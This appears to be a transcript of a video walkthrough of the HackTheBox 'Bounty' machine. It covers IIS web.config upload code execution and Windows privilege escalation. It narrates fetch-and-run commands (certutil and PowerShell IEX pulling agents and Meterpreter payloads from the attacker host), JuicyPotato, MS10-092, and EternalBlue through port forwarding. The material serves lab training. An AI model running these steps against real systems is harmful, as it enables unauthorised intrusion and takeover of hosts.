What's going on YouTube? This is IPSEC. I'm doing Bounty from HackTheBox, which was one of the easier machines. All you have to do is find out it accepts file uploads at transfer.aspx and then realize it's an old version of IIS. So if you upload a web.config file with ASP code at the bottom, it will execute it. So we're going to do that, and because I don't like just doing 15-minute videos, we're going to do the Priv-esque a few other ways. It's a unpatched 2008 box, so almost anything you throw at it will work, and then we may end up doing some little code exercise to automate the file upload. So all that being said, let's just jump in. As always, the first thing we do is nmap-sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call this bounty, then the IP address, which is 10.10.10.93. Can take some time to run, so I've already run it. Looking at the results, we see only one port is listing, that is 80, and of course it is HTTP, and the version is Microsoft IIS HTTPD 7.5. And based upon the version name, version number, we know this is most likely going to be Windows 2008 R2. If we wanted to, we could just Google like IIS Microsoft versions, and the first result will bring back a table, and we can see 7.5 is 2008 R2. So let us, I guess, just go to the web page and see what it hosts. So 10.10.10.93, and we just get a picture. So I'm going to do Control-Shift-U, or maybe just Control-U, to view the source of the page and just see what is there. We don't really have anything. We have Merlin.jpg, and that's it. We got some CSS stuff here, but it's not really leaking anything. So I'm going to go over to Gobuster, and we'll do Gobuster-H, and I will do -u for URL, HTTP 10.10.10.93. Then we want to do -w for word list. I'm going to do user share word list Gobuster, and then directory list 2.3. And this I'm going to do small.txt just for the sake of time. I normally do medium. But we'll also have to do one other thing in this Gobuster, because we have to find a file on this box. And that's just something I know. I just Gobusted around until I found the file. And as our word list says, this is for directory lists. But commonly, if you just put an extension on a directory name, it could be a file name because of how names work. So let's try... see if we can find what type of files this hosts. I'm going to go like robots.txt, because that commonly places files, and we don't get anything. So I'm going to take a leap of faith, because it is IIS, and just going to say, hey, let's try the extension ASPX. And then we'll do -o for out file, and we'll do gobuster-default-aspx.log. This is going to take some time to run, so I'm going to pause the video, and we'll see what the output is. Gobuster has found transfer.aspx, so let's go take a look at that. So /transfer ASPX, and we just get a file upload form. So the first thing I'm going to do is just create a test ASPX file. It's just like PHP. If we can upload ASPX, put a malicious one, execute code, and get shell. So let me get rid of that box. There we go. So we'll do echo, please subscribe, and direct that into ipsec.aspx. So now when we go to upload this, we get invalid file. So let's try a different extension. Let's try something like JPEG, browse ipsec.jpg. File has uploaded successfully. So let us go into Burp, make sure proxy is set to on, and let's re-upload this. So upload ip.jpg, click upload, go to Burp, send this to repeater, click go, render this. We see file uploaded successfully. And we can start playing with extensions. So we can do ipsec.gif, click go, file uploaded successfully. If we do ASPX, we'll probably see invalid file, please try again. So let's try other things. We can do txt, invalid file. So it looks like it only wants image names. What I'm going to do is create just a list of extensions to quickly automate this. And then at the end of the video, we're going to do this a bit better manually in Python. But for the sake of quick time and doing a good walkthrough, let's just do a bunch of things. So config, ASPX, PHP, PHP7, ASP. What other things can access? PL, CGI, EXE. Let's just try those for now. So I'm going to right-click this, send it to Intruder. And if you're on the free version of Burp, it goes slower. That's why I'm going to show you how to do it without it. I cleared the little squiggly things. Click it twice to put something here. And we'll say extension. And what this does is everything between these little symbols is a payload. And then we can change payloads quickly. So let's do load, bounty, extensions. Okay. And then you just click go, start attack. And we see everything was a 200. However, there was only one that was a length of 1350. And that's the content length of this response. And the reason why it's 1350 is because it says file uploaded successfully instead of invalid file, please try again. So this is 5 characters longer than this, which is how we identify that config is allowed. So with this information, I'm just going to Google, let's turn burp off, and we'll say ASPX file upload RCE config, because we can do that extension. And if we didn't use config, I think this blog will still come back. And my Firefox has gone incredibly slow since it updated. Yeah, so we just go to this website, which looks like it's, there we go. Again, just going slow. We see the website essentially says if you put ASPX at the bottom of a web.config file, then you can execute it. And I think this is patched now. It's an old version of IIS, so that's probably why it's 2008 R2, but it's a cool exploit. I'm not going to copy it directly from here because let's zoom in. Whoops. I see these quotes are not directly up and down. So this is some weird Unicode quote that I hate and always just causes issues. I'm going to go to his article that he links and see if where he got it from also has the same encoding issue. And it looks like it doesn't. So these are as I expect. We can copy this. The web.config. Paste it in. Is running ASP. If you see 3 by opening. We'll try this. I'm not exactly sure what this code is doing. Let's see. Browse, web.config, upload. And let's go to web.config. Not found. Let's redo this whole thing because I think it was stuck on intercept. So web.config, file was uploaded. Going here, nothing. If we go back, look at Gobuster, there's a directory uploaded files. So let's try that. Not found. Let's try uploading it again. So browse, web.config. Is that what it said? Yeah, web.config is in the title. Upload, hit it, and we get 3. And it's doing exactly as the text said. It is running ASP code if you see 3 by opening this. So it's doing response.write 1 plus 2. So if it executes response.write, it's running ASP. And if you do 1 plus 2, you're doing math and saying, yes, not only did we execute a command from ASPX or ASP, but we also had it do some type of arithmetic, which proves code execution. So let us swap out the shell with one we've done before. So cat op shells ASPX. Is it there? ls shells grep ASP. Web.aspx is what I want to use. So I'll cat this out so you can see it. I forget what video we did this on. It's just a simple ASPX shell I like to execute commands. So if we go, let's see, probably go into burp, clear a history, turn burp on, file, upload web config, intercept this, go to repeater, and then just paste the code we want. And let's run cmd/c who am I. Click go. We can turn burp off now. Go to web config. And we don't get any output. So what I'm going to try to do is let's do cmd/c ping 10.10.14. I think I'm 17. Config ton 0. I am 17. Click go. TCP dump -I ton 0 ICMP. Go to web.config. And I see the server is pinging me. So I just didn't do it correctly to get the response back. But we can see we had code execution because of that. So let us do certutil to download and execute something. So let's see. What do we want to do? Let's use Merlin, because if we go to the home page, we got a picture of a wizard. So let's use Merlin for this box. GitHub, Merlin, and let's set this up. So git clone. And this is just another thing like Empire or Metasploit. It uses HTTP 2.0, so it's a bit more hidden that way. And because it's not as known, it may fly under the radars of antivirus. So we're in the Merlin directory. The first thing we have to do is create a X509 cert because it does do everything over SSL. And there is no cert here. So let's do open SSL request X509 new key RSA 4096 SHA-256 no des. It sounds like it spelled nodes, but it's no des, no DES. Dash key out dash no key out is server.key. Then we want out server.certificate, and the subject is going to be cn. We can call this anything we want, so we'll do ipsec.rocks. It could be com or whatever, it's just any TLD. Doesn't matter, because we're using IP addresses anyways. It's just for the cert. Generate that, and it'll be valid for 7 days. We got the key, so the next thing we should do is start Merlin. So we can do go run cmd merlin server main.go. And it's weird. Why did it exit on me? Let's see. Let's That's not it. Reset. There we go. Netstat. ALNP grep 443. Kill 11088. Let's do kill -9. Okay, 443 is open again now. Let's try this again. Go run cmd merlin server main.go, and Merlin has started. We do notice it is listening on 127.0.0.1, so if we do -I 10.10.14.17, we can change what host it listens on. The next thing we have to do is tell Merlin, or compile the Merlin agent. So let's go into Merlin, cmd Merlin agent, then we can do go OS is equal to Windows, go arc is equal to AMD 64. So this is telling Go to compile a Windows binary that is 64-bit. Go build, and if you do ld flags -x main.url 10.10.14.17.443, you can change the default URL in the binary. Otherwise, you have to execute Merlin with an argument of the hostname, but doing this just hardcodes it. -o for out file, merlin.exe. Actually, we'll call this agent.exe. And then the file we want to compile is main.go. Unsupported. You're unsupported. Go arc. Is it just win? Windows? There we go. Doesn't like the capital W. Linux being case sensitive. So we can do file agent.exe. We see it as a PE32 plus 64-bit. If we had got rid of go OS and go arc, and we'll just compile to test, we can see it's an ELF, which is Linux. So now we got the Merlin agent. So let's make a directory, HTTP boxes bounty dub, copy the agent into it, and then just run python-m simple HTTP server. Actually, let's do it in this window. Server 80, and we can go back to writing our config to hack all the things. I already had it in window 1. Do I have it somewhere? Vim web.config. Huh. Oh, I was editing it in Burp. That's why it's not there. Okay, that makes sense. So we want to do cert util -url cache -split -f for file http 10.10.14.17 agent.exe, and we're going to save it to c:users public agent.exe, and then we want to execute it. So and c:users public agent.exe. Click go. And then we have to go back to our browser and do web.config to execute it. We look at a Python thing, nothing happened. Didn't do anything. So let's see. Render. File was uploaded successfully. Cert util -url cache -split -f 10.10.14.17 agent.exe. Let's just get rid of this for now and only download the file. Then go. And I was in the wrong directory. simple HTTP server in the www directory. Go. Web.config. And here we go. It is downloading agent.exe. And then we can do another one just to execute it. So this is download. And then we need a request to execute agent.exe. Oh, we can just do this. Click go and run it. Internal server error. So maybe it doesn't like these double slashes. Let's do single slashes. Go. Still internal server error. Looking back, we don't have any callbacks. So let's try cmd/c. And it looks like it's hanging, which is a good sign. Going back to a terminal prompt, there we go. So for some reason, we need just to preface that with cmd/c to start a command, and we have a agent check-in. So I can kill my web server. So we can do agent list and see what agent we have, I guess. The next step to do would be agent interact. And we can do info and see what it is. Windows, 64-bit, everything we'd expect. The only thing I'm going to do now is change the wait time from 30 seconds to 5 seconds. So set sleep 5s. And then the next time this thing checks in, it'll change it to check in every 5 seconds instead of 30 seconds. If we do help, we can see we can execute commands, upload files, download files, etc. If we do back, there is help here. We can do use module, and then it has a bunch of modules we can do. If we want, we can do Windows x64, tab, and then we can see all the various modules we can do. Let's do, I guess, power up. Do info, set agent, info, set agent. Do we have to agent list, use this module, set agent. Okay, that may be a visual bug. If you do info here, the name agent is in uppercase. Doesn't work. Lowercase, it does. So that's what was happening there. We're going to do BCC, info, and then we can just do run, and it creates the job, and we'll now be running Powersploit, or power up. So we'll see what this outputs back. And we see one flaw of something I don't really like about Merlin is its commands or its things, in order, I guess, to update easier, always pulls it from GitHub. And HackTheBox doesn't have internet, so none of these modules will work because I think it's doing IEX against GitHub constantly. And yeah, so should be linked in the GitHub project, in my opinion. Without that, doesn't really help us, so let's just go back and do agent interact, info, and we want to do, not info, help, and we can run commands. So we can do cmd whoami/priv, go to the job, and we see we do have the SEImpersonate privilege. We could also do like system info, cmd system info, and this will show us what patches are installed. And we see the hotfix is nothing. So this is just a fresh install of Windows 2008 R2 and it's 7600 in this version. So this is not even Service Pack 1. This is just Windows 2008 R2. So whenever that was released, everything after that's going to be vulnerable. So I'm guessing things like Eternal Blue, can't think of any other PrivX that come out. MS16032, but I think that one's the one that requires 2 processors to elevate. This one only has 1, but all those will work on this box because it just has been patched. However, with the SEImpersonate privilege, we don't even need like a dangerous exploit. We can just use rotten potatoes or juicy potato. So I'm going to go download that, juicy potato GitHub. And let's do decoders. Decoder. Okay, that's it. I just didn't recognize the username OHPE. We go to release, download it, and I forget what video, but there was a video where we actually compile it. Maybe that's Fighter. I think that is Fighter. But let's copy downloads juicy potato. We'll just call this JP because typing that's a pain. Exit. We can upload root HTTP boxes bounty jp.exe to c:users public jp.exe. And you'll notice I have the habit of always doing 2 backslashes when on Linux. Just habit, I guess. A lot of times though, backslash is escape, so you just see like c:users public jp without the slashes. So out of habit, I always do 2. File has been uploaded, so we can do cmd c:users public jp.exe and see what arguments we need. -t, stir to try both, sure. The program, let's do c:users public agent.exe to call back our Merlin agent that we dropped in the box. And the COM port doesn't matter, so we'll do 9001 because, well, it's over 9000. Created the job. And we have auth result as NT authority system. And I don't know if we got a check-in. Agent list. We should see Merlin with a new check-in. That's odd. Let us do 2 slashes. Let's see if this changes anything. Okay, there we go. So it did exactly as I said probably and escaped 1 slash, or the slash was an escape and just passed a bad path. So that's why I'm always in the habit of doing 2. So we got a new check-in agent, so we can do agent list. And we see the second agent as NT authority system, so we can interact with this. And then do cmd dir c:users administrator desktop. Or we could even probably download desktop root.txt. Is that where it is? Let's see. Back agent list. It says the agent's active. It's not giving me responses. Info. Oh, crap. It's on a 30-second sleep time. So sleep 5s and let this check in because waiting 30 seconds per command is a little bit annoying. We have it now saving the file. I have no idea where that's saved. Instead of trying to guess, I'm just going to use find root.txt. We probably specify star. There it is. Then we can go over to exec, wc-c to count characters, open and close squiggly brackets to put the contents of each thing it found. And we see 32 characters on desktop root.txt, so we have that box done. If we wanted to, we could do other paths. So let's do this box through Metasploit, and we won't use Juicy Potato. The first thing we do is go to TrustedSec's Unicorn tool, which is my favorite way to load Metasploit. We can look at it, and we want to do Windows Meterpreter reverse HTTPS RIP 10.10.14.17, and we'll listen on port 9001. It's going to take a little bit to generate the shellcode, but once it does, we'll be able to input it into our burp. So let us do PowerShell IEX new object net.web client download string HTTP 10.10.14.17 unicorn.txt is what we'll call it. Okay. Our payload has been created, so let's copy PowerShell.txt into root HTTP boxes bounty dub unicorn.txt, and then we can start Metasploit by just doing msf console-r unicorn.rc because it created that file for us, and then go into dub and start a web server. 80. There we go. Everything looks good. Let's go into burp. Send this payload. Go to a web browser. We have to execute web.config. And we don't have a callback on a web, so we definitely don't have Metasploit. Let us try changing the payload a little bit. We'll do cmd/c. Start a command prompt, and then to load PowerShell. Try this now. Still not getting anything. Let's see. Let's just do this in a new browser window. Definitely hangs. Do we have a typo here? HTTP 10.10.14.17. We don't have a typo. That looks good. Try -c for command. Everything looks good. Go. Hit. Refresh. Go. And we're not getting any callbacks. So something's wrong with our payload. Or I just need to revert the server. So let's see. cmd/c PowerShell-c IEX new object. So when in doubt, let us just go back and we'll do a ping because we know ping works. So ping 10.10.14.17, and if this doesn't work, then we know the box got foobarred. So TCP dump -i ton0 ICMP. It's another valid reason why always start with minimal recon, so you know something that works. So the file doesn't exist. Upload it. Go. It's taking a little bit. And we're not getting any pings back. We can try cmd/c. Load. Upload. And still nothing. Try this in this new tab. So it looks like something we had done or someone else screwed up this box because our basic payload of ping no longer works. The box should be rebooted now, so let's try it again. We click go. We get an internal server error. We render this. I think this event validation and VIEWSTATE cookie aren't the same. So let's see. Make sure burp is set to off. Go here. 10.10, 10.93. Let's view the source for transfer. and copy these values. View state. Go back to repeater. And the next one was event validation. We copy these two, click go. There we go, file uploaded. That's what we expect. So now we can click go here. And we get pings. So the box was indeed broken. So let us now go back and try this PowerShell thing. Did I leave it here? I did. So PowerShell IEX download string. Click. We'll just do cmd/c to be safe. So that's going to spawn a command prompt and then do PowerShell. Click go. It's the same thing. Instead of copying both of those, let's just copy the command. Where is command? Here it is. Click go. File has been uploaded. Hit the page again. There we go. We finally got Unicorn. And is it going to execute? Does not look like it. It hit it, but did not execute. So we must have an error somewhere. So PowerShell, IEX new object, download string, unicorn.txt. You can do -c. Try that. Oh, it was just taking a while, being slow. We got a session open. So with a new Metasploit session, we can do search, was it suggester? Local exploit. There we go. We can run this post module. Show options, set session to 1, because 1 is Meterpreter session 1 opened. And then we run this, and we're going to check all the local exploits. And I just noticed we're on a 64-bit version of Meterpreter, so we're going to run this twice, once on a 32-bit version of Meterpreter. I noticed by that x86 Windows. So I'm going to run this twice. I'm going to run this as 32-bit, migrate to a 64-bit process, run it again, and see what the differences are. It collected all the exploits, and now it is trying them. And as we expect, it's vulnerable to almost everything. So we could just migrate to a 64-bit real quick. So let's copy this, go to a new window, V32, and then V64 to compare the difference. We probably had enough to go by to pop this machine, but for the sake of learning, let's see everything. So we're doing session-i1 to enter, I think it's plural, sessions-i1 to enter a Meterpreter shell. We can do a PS to view all the processes. And we want to pick a 64-bit process to migrate into. So let's try, I don't know. I always hate migrating into PowerShell or command prompts because they tend to go away quickly. Don't know what W3P is, but let's see if I can migrate into it. Migrate 1396. That was that W3WP process. And we'll see if it actually successfully migrates. If not, then we can try like PowerShell or conhost or something else. But the key thing is just looking for something that was owned by me and had x64. There we go. It says it's migrated. We do help. I forget what it is. One of the info commands. File system. Core commands. Info, no. File system. Networking. Is it sysinfo? Yeah. See if this says. Yep, our Meterpreter shell is 64-bit. So now we can migrate this, run the local exploit suggester again, and we see the difference is it's gathering local exploits for x64 windows instead of x86 windows. So let this one run, and then we'll paste it over on the other pane and compare the differences. Instead of the like 40 different exploits the 32-bit had, this one has 18, and only 3 were found to be vulnerable. So copy this, go to the other pane, and paste that in. So the one that sticks out is the very top one, MS10092, scheduler elevator, because that is on both of them. So let's go and use that. Copy the exploit, use show options, set session to 1, and run this. And we'll see if this one works. If not, we'll have to migrate back into a 32-bit process and try it again, because Meterpreter exploits are picky like that. And I know straight off the bat, it's not going to work because our callback IP is my WAN IP. So set lhost ton0. I always do it twice because I think there's a bug where it doesn't take sometimes. And looks like it's reliable. We're sending it, and we got session 2 open. So let's background, sessions, and we see session 2 is NT authority system at bounty. So that is another way to privask. If we wanted to, we could also just do like eternal blue and pivot through the firewall. Because if we do sessions-i1, cmd shell, netstat-a. I should have done an to not do DNS lookups. This is going to take a while. So 445 is listening on this box. There's just a firewall that blocks it. 445 is Samba. It listens on almost every Windows Server box. You'd never really see it turned off. You just firewall what it can talk to. So since this hasn't been patched, we can do Eternal Blue as well. Let's just Control-C to terminate this channel. So to do that, we want to create a pivot through this Meterpreter session. So we're going to do port FWD-H for help, and we need port forward, and then the verb, we want add, and then here's all the options we can do. We're going to want to listen on our port 445, and then connect to the remote host port 445 through this Meterpreter session. So we want the -L, -P, and -R flags. So let's do port forward add -L 445, -R 127.0.0.1, and -P, hold on, excuse me, -P 445. So it's created this relay, so it's listening on our port 445, sending it through this Meterpreter session, and going to the remote host port 445. So if we look and do a netstat-an grep 445, we see our host is now listening on port 445. I've said 445 a lot, so we'll stop. But search Eternal Blue. Search, what was it? MS17010. There we go. Let's see. Use. Which one do we want? Probably this one. Show options. Set our host to 127.0.0.1. And then lhost. Set lhost to be ton0. And that should be good. So we'll run Eternal Blue. It connects to our port 445, forwards it through, and we see it attempting. Unable to continue with improper OS architecture. Let's see. Why did that fail? DCE RPC service may be blocked. So let's try 139 and 138 as well. I think those are other SMB ports. So sessions-i1, port forward, 138, 39, Hope it's not using UDP and 137. Not exactly sure which 1.3 port SMB is, but doing those three should cover it. So now run again, and it still can't determine architecture. Let's do show advanced options. Can we manually set architecture? Verify target, set verify architecture to false, and we'll see what happens with this. When you start doing things like this and disabling the verification checks, you may crash the box more often than not. So, sending it. It says it completed successfully, but we don't have a shell. So it's still trying to trigger this overflow. The first attempt has failed. It's trying again. Failed for the second time, and now it's trying with 22 groom allocations, whatever that means. I know there's a talk on YouTube if you search for like DEF CON Eternal Blue or MS1710. There's a really good technical talk that I just haven't got a chance to listen to yet, but still trying. I'm guessing this probably won't work, but it was worth giving it a shot. Actually, since this is going to take a while to run, we're going to background this and put a reminder, Eternal Blue. And while that goes, since it probably, as I say that, it finishes and says no exploit created. Let's just do show advanced options one last time to see if there's anything else we can do. That may help it along. Max exploit attempts 3. Let's see. I got the architecture correctly, got the platform correctly. Let's see. Everything looks good. We'll just do max exploit attempts to like 15 and then try something else. So exploit attempts, we'll do 20. Run. And then let's take a step way back because we've priv-esked twice on this box, maybe 3 if Eternal Blue ever works, but at least you know how to do the port forwards now. Let us take a step even further back to go all the way to how we discovered this file upload piece. This thing. So what we're going to do is create a Python script to automatically do all of this. So let's go and do vi upload.py, and we're going to need the request module, and we also want regular expressions because we know we have to grab whatever these are, the view state and event validation. So regular expressions will help with that, and request is of course the module to connect to websites. So here's the start of the script. Since we're going to be uploading a bunch of files, we want to create this in a function so we don't have to rewrite code. So we'll just do a function, test upload, file name, and then the URL to the upload is http 10.10.10.93 transfer.aspx. And then we have to create our session. So S for session. You can put anything you want there, but request session, and now they're initiated. So what that's going to do is when we go to a web page, if the server sends any cookies or anything, it's going to just remember that and send them in the future. So a request is going to be session.get and then the URL. So if we did print our.cookies, I think one will work like this. And we just call test upload, please subscribe, and Python 3 upload.py. I forget how to call the cookies jar off the top of my head. Print. Oh, our.cookies 0, like this. And we don't have any cookies because the server didn't send us any. But if we did, they'd appear here. So that's what that does. The main reason why we have to do this is because we're not interested in the cookies. We're interested in this text. So we see we want this event validation and view state. Because you remember what happened when I reverted the box and didn't have this, is it did an error 500. So we need to do a regular expression to grab these two pieces of data. So we'll do the view state first. If we copy this, we can just do view state is equal to re.findAll, and then paste in, then parentheses, dot star question mark, and parentheses, and that single quote in the expression. R.text is the text it wants to search, and then we're going to grab the very first result, so 0. So if we do print view state, we get the view state. And this may be different on every load, I'm not positive. Looks like that doesn't change. So the next piece we want is this event validation. So let's grab this and do event validation is equal to re find all, r paste again, dot star question mark, and then end it all, r.text, 0. So if you're wondering what that dot star question mark is, that's just match any character unlimited amount of times until double quotes, is what that regular expression is saying. So we can print event validation to verify that it works. It did not. So let's see. Event validation, that is correct. We did something wrong. Oh. R.text and then 0 in the end. There we go. So we got both the view state and event validation. And does event validation change constantly? It does not. So we don't have to get these every time. But for the sake of the script, we are going to get them every time and pretend they're like a cross-site request forgery thing, which is in the Sense video is where cross-site request forgery is. So pretend it's there, and this is what that's doing. So the next thing we have to do is create our post request. So post data is equal to, and it's going to be a dictionary, view state. And what this is doing is creating these pieces, the variables it's sending. So view state, then we want event validation, and I think that's it. So we got the two arguments here, and this one is a file name. So we do that a little bit differently, because if you look at the request, it's got a extra parameter file name, and the request module has something for that. So we'll do upload did file is equal to file upload 1. That is this, the name. And then we do a tuple file name, and then the contents of the file. Please subscribe. And that's how we do the file upload. And the final piece is just making that final post request. So we'll do r is equal to s.post, URL, files is equal to uploaded file, data is equal to post data, and that should be it. Return r.text, and we'll do test upload. We can print this, And I mistyped something. I have port instead of post. Response. I shorthanded something. TEXT. There we go. But we don't have that like invalid file or anything. It didn't error. So something odd happened. Let's try doing a proxy. So we'll do burp is equal to HTTP 127.0.0.1.80.80. And in this post request, we can set the proxy. So proxies is equal to burp. Go to the proxy tab, intercept on. Send this to repeater, and let's compare. So we got the view state, event validation, the file name, so file upload 1, file name web.config, file upload 1, file name, so that looks good. And then we got button upload, and I forgot to code that one. So let's go back in our script, and we'll add btn upload. Execute this. And the new request, this one has btn upload as upload, forward it, and we get invalid file. So what we can do with this is say response is equal to test upload, and we'll do file name. Actually, let's just create the loop now. So we can do for line in open word list extensions dot list as read, and then print line dot strip, and let's create extensions dot list, and we'll do PHP ASPX config test, please subscribe, JPEG, GIF, PNG, HTML. We'll do all those things. So when we run upload.py now, it just loops through them. So we do vim upload.py. And let's see. It's printing, so we want to do response is equal to test upload, and then IPsec dot we'll call this extension and rename line to extension. Okay. And then say if invalid file not in response, print extension. So when we run this, it's probably going to go through burp again. We didn't disable that, so turn intercept off. And if invalid file not in response. So let's print response. See what this is. Because all those should have been invalid file. page is an error. So we have something screwed up because we're getting 500 errors. If we go to Burp, HTTP history, we can look at this, the response, runtime error, where's the file name? IPsec, and then it's got a new line character at the end. So I think that's what 0A is. So let's see, if we do for line and extension response, let's see, Python 3, x is equal to ABC, x, -1. There we go. Just finding a way to trim the very last character off. We want this one, -1. Trim that very last character and see what happens. Still erroring out. Let's see. Upload plus. I want the -1 there. There we go. We're not getting 500 errors anymore. So the issue was I was taking one off the whole response of the test upload. I need to move that next to the extension. No longer print response, just print the extension. And we can see out of extensions.list, 4 extensions that were allowed is config, JPEG, and GIF. So that is going to conclude the video. Hope all of it made sense. Take care, and I will see you all next week. Oh wait, I forgot. Eternal Blue, still going. Doesn't look like it's going to work. It probably just doesn't have the offsets for this OS. So, oh well. Well, if you want to do watch Eternal Blue, check out the Blue video. So, yep, now it's it. Take care all. See you all next week.